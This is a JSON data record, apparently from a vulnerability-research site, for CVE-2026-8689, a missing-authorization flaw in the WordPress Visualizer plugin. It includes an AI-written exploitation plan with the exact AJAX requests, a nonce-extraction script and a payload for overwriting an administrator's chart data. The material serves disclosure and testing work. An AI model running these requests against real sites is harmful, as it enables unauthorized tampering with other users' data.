[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFzZ4YHPdIv0si-RzAREu0OEgJ_ZCI4pKntHO75U6WFU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-8689","visualizer-tables-and-charts-manager-for-wordpress-missing-authorization-to-authenticated-subscriber-arbitrary-chart-cre","Visualizer: Tables and Charts Manager for WordPress \u003C= 3.11.14 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Chart Creation and Modification via renderChartPages() and uploadData() Functions","The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.11.14. This is due to a missing capability check on the renderChartPages() and uploadData() functions, where the wp_ajax_visualizer-create-chart and wp_ajax_visualizer-edit-chart AJAX actions invoke renderChartPages() without any current_user_can() check, and wp_ajax_visualizer-upload-data invokes uploadData() which also lacks a capability check and validates its nonce without an action argument, making it trivially bypassable. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary chart posts and access or modify chart data belonging to other users, including administrators.","visualizer",null,"\u003C=3.11.14","3.11.15","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-27 19:31:18","2026-05-28 07:43:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd18e9696-0f96-4478-9871-a93ac2976c11?source=api-prod",1,[22,23,24,25,26,27,28,29],"CHANGELOG.md","classes\u002FVisualizer\u002FGutenberg\u002FBlock.php","classes\u002FVisualizer\u002FModule\u002FAdmin.php","classes\u002FVisualizer\u002FModule\u002FChart.php","classes\u002FVisualizer\u002FModule\u002FSetup.php","classes\u002FVisualizer\u002FPlugin.php","classes\u002FVisualizer\u002FRender\u002FLayout.php","classes\u002FVisualizer\u002FRender\u002FPage\u002FTypes.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-8689\n\n## 1. Vulnerability Summary\nThe **Visualizer: Tables and Charts Manager** plugin (\u003C= 3.11.14) contains a missing authorization vulnerability in its AJAX handlers for chart creation and data modification. Specifically, the functions `renderChartPages()` and `uploadData()` in `Visualizer_Module_Chart` do not perform `current_user_can()` checks. This allows any authenticated user (including Subscriber-level accounts) to create new chart posts (Custom Post Type: `visualizer`) and modify data for existing charts, including those belonging to administrators. Furthermore, the nonce validation in `uploadData()` is implemented incorrectly by using a default action or no action argument, which permits the use of generic nonces found in other parts of the site.\n\n## 2. Attack Vector Analysis\n- **Endpoints:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Actions:** \n    - `visualizer-create-chart` (Triggers `renderChartPages`)\n    - `visualizer-edit-chart` (Triggers `renderChartPages`)\n    - `visualizer-upload-data` (Triggers `uploadData`)\n- **Required Authentication:** Subscriber or higher.\n- **Payload Parameters:** \n    - `action`: The AJAX action name.\n    - `nonce` or `security`: Nonce for validation.\n    - `chart`: Target chart ID (for `uploadData`).\n    - `csv`: Data payload (for `uploadData`).\n\n## 3. Code Flow\n1. **Action Registration:** In `classes\u002FVisualizer\u002FModule\u002FChart.php`, `Visualizer_Module_Chart::__construct` registers AJAX actions:\n   ```php\n   $this->_addAjaxAction( Visualizer_Plugin::ACTION_CREATE_CHART, 'renderChartPages' ); \u002F\u002F visualizer-create-chart\n   $this->_addAjaxAction( Visualizer_Plugin::ACTION_UPLOAD_DATA, 'uploadData' );       \u002F\u002F visualizer-upload-data\n   ```\n2. **Missing Auth in `renderChartPages`:** This function executes and renders the chart editor pages. It lacks a `current_user_can( 'edit_posts' )` check. \n3. **Improper Nonce in `uploadData`:** As per the vulnerability description, `uploadData()` validates a nonce without a specific action argument (effectively `check_ajax_referer( -1, ... )` or similar). Generic nonces are generated in `Visualizer_Render_Page_Types::_toHTML()`:\n   ```php\n   echo '\u003Cinput type=\"hidden\" name=\"nonce\" value=\"', wp_create_nonce(), '\">';\n   ```\n4. **Data Modification:** `uploadData` processes incoming CSV\u002Fdata and updates the post meta for the specified `chart` ID without verifying if the current user owns or has permission to edit that specific chart.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability allows bypass because it uses a default action (`-1`) nonce. A Subscriber can obtain such a nonce by triggering the `renderChartPages` function which is itself unauthorized.\n\n1. **Triggering Nonce Leak:** Navigate to the `visualizer-create-chart` AJAX endpoint. Since it lacks authorization, it will return HTML.\n2. **Extraction:**\n   - **Method:** `browser_navigate` to `http:\u002F\u002Fvulnerable-site.test\u002Fwp-admin\u002Fadmin-ajax.php?action=visualizer-create-chart`.\n   - **Extraction Script:** Use `browser_eval` to extract the nonce from the hidden input field rendered by `Visualizer_Render_Page_Types`.\n   - **JS Identifier:** `document.querySelector('input[name=\"nonce\"]').value`\n\n## 5. Exploitation Strategy\n\n### Step 1: Create an Arbitrary Chart\nA Subscriber can create a new chart post simply by calling the creation action.\n- **HTTP Request:**\n  - **Method:** POST\n  - **URL:** `http:\u002F\u002Fvulnerable-site.test\u002Fwp-admin\u002Fadmin-ajax.php`\n  - **Body (URL-encoded):** `action=visualizer-create-chart&type=line`\n- **Expected Response:** HTML for the chart creation wizard, confirming the backend initialized a new chart context.\n\n### Step 2: Obtain Nonce from Step 1 Response\n- **Extraction:** Parse the HTML response from Step 1 (or navigate as described in section 4) to find the value of `input[name=\"nonce\"]`.\n\n### Step 3: Modify Administrator's Chart Data\nOnce a nonce is obtained, target an existing chart ID (e.g., ID `100` created by an Admin).\n- **HTTP Request:**\n  - **Method:** POST\n  - **URL:** `http:\u002F\u002Fvulnerable-site.test\u002Fwp-admin\u002Fadmin-ajax.php`\n  - **Content-Type:** `application\u002Fx-www-form-urlencoded`\n  - **Body:** \n    ```text\n    action=visualizer-upload-data&security=[NONCE]&chart=100&csv=Label,Value%0AAttacker,9999\n    ```\n- **Expected Response:** Success JSON (likely `{\"success\":true}`).\n\n## 6. Test Data Setup\n1. **Admin Actions:**\n   - Install Visualizer 3.11.14.\n   - Create a chart as Admin. Note its ID (e.g., via `wp post list --post_type=visualizer`).\n2. **Subscriber Actions:**\n   - Create a user with the `subscriber` role.\n   - Login as the Subscriber.\n\n## 7. Expected Results\n- The Subscriber, who normally has no access to the Visualizer menu, can successfully trigger the `visualizer-upload-data` action.\n- The `visualizer-source` or `visualizer-data` post meta of the Admin's chart (ID 100) is updated with the Subscriber's CSV payload.\n\n## 8. Verification Steps\n1. **CLI Check:** Verify the post meta of the target chart.\n   ```bash\n   wp post meta get 100 visualizer-source\n   ```\n   (Wait for the sync\u002Frender to see the new data `Label,Value\\nAttacker,9999` reflected).\n2. **UI Check:** View the chart on the frontend (if published) to see the modified values.\n\n## 9. Alternative Approaches\nIf `visualizer-create-chart` does not directly return the nonce, check the `admin-ajax.php` localization on a standard post\u002Fpage where the Visualizer block might be active.\n- **Localization Key:** `visualizerLocalize`\n- **JS Access:** `window.visualizerLocalize.createChart`\n- Some nonces might be bound to the Gutenberg editor. If a Subscriber can access the Gutenberg editor (e.g., if \"Users can register\" is enabled and they have post creation rights), the nonce `visualizerLocalize.chartEditUrl` might be leaked there.","gemini-3-flash-preview","2026-06-04 16:40:22","2026-06-04 16:41:43",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.11.14","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvisualizer\u002Ftags\u002F3.11.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvisualizer.3.11.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvisualizer\u002Ftags\u002F3.11.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvisualizer.3.11.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvisualizer\u002Ftags"]